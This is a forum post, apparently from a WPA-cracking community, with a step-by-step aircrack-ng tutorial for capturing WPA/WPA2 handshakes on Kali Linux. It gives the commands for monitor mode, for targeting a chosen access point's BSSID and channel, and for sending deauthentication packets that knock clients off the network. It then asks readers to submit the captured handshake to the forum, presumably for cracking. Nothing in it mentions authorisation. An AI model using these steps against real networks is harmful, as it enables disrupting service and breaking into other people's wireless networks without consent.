WPA/WPA2 Cracker, Penetration and Utilations Tools

WPA HASH Knowledge ... WPA/WPA2 handshake ... Capture WPA Handsha...  

[Sticky] Capture WPA Handshake using Aircrack - with Kali Linux  


Member Admin
Joined:1 year  ago
Posts: 24
07/04/2018 6:35 pm  

Watch YouTube video (the fifth minute ends.).

Edited: 1 year  ago

Member Admin
Joined:1 year  ago
Posts: 24
08/04/2018 12:52 am  
Don't be afraid if YouTube video is not understood!. There is also a picture-assisted article.
So, Let's Start Our tutorial Step By Step

Setup 1.

Enable Your Wireless Card Monitor Mode.

:~# sudo airmon-ng start [Interface_name]

Setup 2.

Run Airodump-ng To Capture All Traffic

:~# sudo airodump-ng [Interface_name]

Setup 3.

From Airodump-ng Terminal, Note Your Target Access Point MAC address And Channel Number

Setup 4.

 Now, Focus Your Airodump-ng Sniffer To Capture Only Specific Target Packet And Save in a .cap file. 

:~# sudo airodump-ng -c [ch] --bssid [AP_MAC_ADDRESS] -w [FILE_NAME] [Interface_name]

Setup 5.

Now, Generate De-authentication Packet And Send To Access Point. Basically, These De-authentication Packets Will Break The Connection Between Client and Access Point. Then, To Connect Back Again Client And Access Point Will Needed To Do 4 Way Handshake Procedure. 
Open A Separate Terminal And Type :

:~# sudo aireplay-ng --deauth 2 -a [AP_MAC_ADDRESS]

Setup 6.

Our Airodump-ng Has Capture 4 Way Handshake Packets.

Setup 7.

To Ensure 4 Way Handshake Availability We Will Use Aircrack-ng.
Open Separate Terminal And Type : 
:~# sudo aircrack-ng [wpa_file.cap]
Now, send the captured handshake package to our forum.
Written By:
Edited: 1 year  ago


Please Login or Register

tr_TRTurkish en_USEnglish